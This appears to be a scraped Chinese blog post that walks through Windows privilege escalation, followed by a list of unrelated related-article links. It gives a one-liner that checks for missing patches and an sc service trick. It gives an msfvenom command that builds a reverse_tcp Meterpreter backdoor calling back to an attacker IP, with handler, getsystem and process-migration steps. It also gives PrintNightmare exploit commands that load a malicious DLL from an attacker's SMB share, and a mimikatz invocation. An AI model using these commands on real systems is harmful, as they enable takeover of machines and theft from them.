当前位置: 首页 > news >正文

payload

1.利用exp提权

再用一句话木马连接到目标服务器之后,可以直接在命令行输入:

快速查找未安装的补丁cmd指令

systeminfo > micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt

他会快速查找未打补丁的 exp,然后在网上找一下利用过程或者直接找利用程序

已对外公开exp注:
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/WindowsExploits/Exploits
https://github.com/AusJock/Privilege-Escalation

exp有直接的exe运行程序的话就可以把这个exe程序丢到目标机上,让目标机运行

2.sc命令提权(比较鸡肋)

sc Create syscmd binPath= "cmd /K start" type= own type= interact

3.kali提权

(1)先用nsfvenom生成一个exe的后门,上传到目标主机上

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.88.132 LPORT=4444 -f exe > abc.exe

(2)进入msf,执行命令

msfconsole

(3)输入 use exploit/multi/handler

(4)输入 set payload windows/meterpreter/reverse_tcp

(5)输入 set lhost 192.168.88.132

(6)输入 set lport 4444

(7)输入 run ,并在目标主机上运行abc.exe

(8)如果在msf的界面上出现了meterpreter>的界面,则成功了

这里可以先尝试执行sysinfo命令查看系统补丁情况,匹配未修复的内核溢出漏洞

上传对应漏洞的 EXP(漏洞利用工具),在低权限 cmd 中直接执行

执行完成后,直接弹出 SYSTEM 权限的命令行,一步完成提权

(9)输入shell可以进入到目标主机终端,whoami查看权限

如果发现权限太低(这里好像可以直接在meterpreter>输入getuid # 查看权限),提权如下:

法一:exit先退回到meterpreter>界面,输入getsystem再输入shell就可以了法二:迁移进程:,原理是通过该指令将他的权限移植到我们自己这里来。
(1)首先使用ps查看哪些进程被较高用户权限开启的进程
比如下面的336(PID),是system开启的,我们就可以尝试将他的权限移植给我们
(2)migrate 进程PID   #即migrate 336
如果出现Migration completed successfully就代表成功移植了

推荐享用技术文章:提权 | Windows系统 - 竹等寒 - 博客园

https://mp.weixin.qq.com/s/WRY5xRwhcL_hVGvaeSHOJg

四、内核逻辑漏洞提权(有时间就搞一下)

核心原理:这类漏洞不依赖内存溢出,而是内核本身的权限校验逻辑存在缺陷 —— 比如 Windows 的进程令牌管理、对象管理、系统服务机制中,没有严格校验调用者的权限,低权限用户可以构造特殊的系统调用,欺骗内核给自己的进程分配高权限令牌,直接完成提权。

真实利用场景

最具代表性的就是PrintNightmare(噩梦打印)漏洞(CVE-2021-34527),漏洞存在于 Windows 自带的 Print Spooler 打印服务中。绝大多数企业服务器、办公电脑都会默认开启该服务,黑客只需拿到普通用户权限,一键执行 EXP,就能直接提权到 SYSTEM,甚至可以横向渗透域控制器。

漏洞利用

利用工具

python版本的 https://github.com/cube0x0/CVE-2021-1675
C#版: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare
C++版本的 https://github.com/afwu/PrintNightmare
本地提权版: https://github.com/hlldz/CVE-2021-1675-LPE
mimikatz: 2.2.0 20210709 Printnightmare rewrited

漏洞过程

  1. 首先搭建一个SMB匿名共享,放恶意dll文件。
  2. 工具运行后会先检测C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_xx文件名,自动替换。
  3. 然后远程拉取我们设置的匿名共享的恶意dll文件执行

4.可以使用rpcdump.py来扫描潜在的易受攻击的主机,如果它返回一个值,它可能是易受攻击的
协议:[MS-RPRN]:打印系统远程协议

kali
impacket-rpcdump  @192.168.0.1 | grep MS-RPRNwindows
python3 rpcdump.py @192.168.0.1 | findstr MS-RPRN

然后进行利用,这里使用 dll 是 cs 生成的 dll

windows
python3 CVE-2021-1675.py djhons.com/test:Admin@123@192.168.0.1 "\\192.168.0.2\smb\shell.dll"kali
python3 CVE-2021-1675.py djhons.com/test:Admin@123@192.168.0.1 '\\192.168.0.2\smb\shell.dll'

mimikatz

mimikatz.exe
misc::printnightmare /server:192.168.0.1 /authuser:localuser /authpassword:pass /library:\\192.168.0.2\smb\shell.dll /nodynamic
http://www.gsyq.cn/news/1554163.html

相关文章:

  • 工业吸尘器TOP3实测:2026年史沃斯凭什么登顶?推荐哪个好? - 工业清洁测评社
  • 2026揭阳本地人必选防水补漏检测维修公司靠谱服务商TOP5推荐:房屋渗漏水检测维修/卫生间/厨房/天花板/阳台/外墙渗漏水检测补漏维修-暗管漏水检测专业仪器精准定位漏水点 - 即刻修防水
  • 论文AI智能写作怎么写?5款工具全流程指南 - 掌桥科研-AI论文写作
  • Printspoofer64提权
  • 深入解析ColdFire微控制器GPIO模块:寄存器配置与引脚复用实战
  • Chow Varieties与Lawson同调群在代数几何中的应用
  • 杭州附近专业防水补漏本地师傅全屋漏水检测维修外墙渗水暗管查漏施工 - 速递信息
  • 令牌窃取-烂土豆提权-MS16-075
  • 论文AI写作助手怎么用?豆包详细操作步骤 - 掌桥科研-AI论文写作
  • 2026吉安市黄金回收全攻略五家实体门店横向评测 - 润富黄金回收
  • Playwright反检测实战:五大技巧伪装浏览器指纹与人类行为,绕过机器人检测
  • 2026年6月最新百达翡丽中国官方售后网点地址电话热线客服服务 - 百达翡丽服务中心
  • MATLAB版粒子群优化工具包:含标准PSO与变异增强算法,支持多种非线性测试函数极值求解
  • 2026杭州黄金回收行业解析琳弘湾万金汇金裕恒福满多门店汇总 - 润富黄金回收
  • 3大核心技术解密:如何让Windows老游戏在现代系统上焕发新生
  • 如何在5分钟内为你的浏览器添加本地AI助手:Page Assist完全指南
  • UI自动化测试中的等待策略:从原理到实战的完整指南
  • 企业微信机器人实战:从文本到图文,一站式消息推送指南
  • 影刀RPA企业级部署指南:从单人到团队的影刀RPA最佳实践——企业专属
  • 信道模型与信道容量:从理论抽象到现实通信的数学桥梁
  • C语言宽字符处理:从乱码到国际化编程的完整指南
  • C语言标准库内存管理与字符串转换函数深度解析与实战指南
  • FanControl传感器识别技术解析:华硕主板兼容性挑战与WMI协议解决方案
  • ExplorerPatcher:重新定义Windows界面自由,找回你的操作习惯
  • 告别复杂绘图工具:Mermaid Live Editor免费在线图表编辑终极指南
  • PPTP协议深度解析:从报文交互到工作模式实战
  • DeepSider深度解析:浏览器AI代理架构与私有化大模型调度实践
  • 素颜霜哪款好用自然?2026十大公认不假白素颜霜榜单:早八通勤 - 新闻快传
  • 2026成都男款包包回收行情解析!商务公文包、手拿包为什么折价更快? - 逸程
  • 歌曲怎么提取伴奏?2026伴奏音轨分离工具实测推荐对比首选 - 速递信息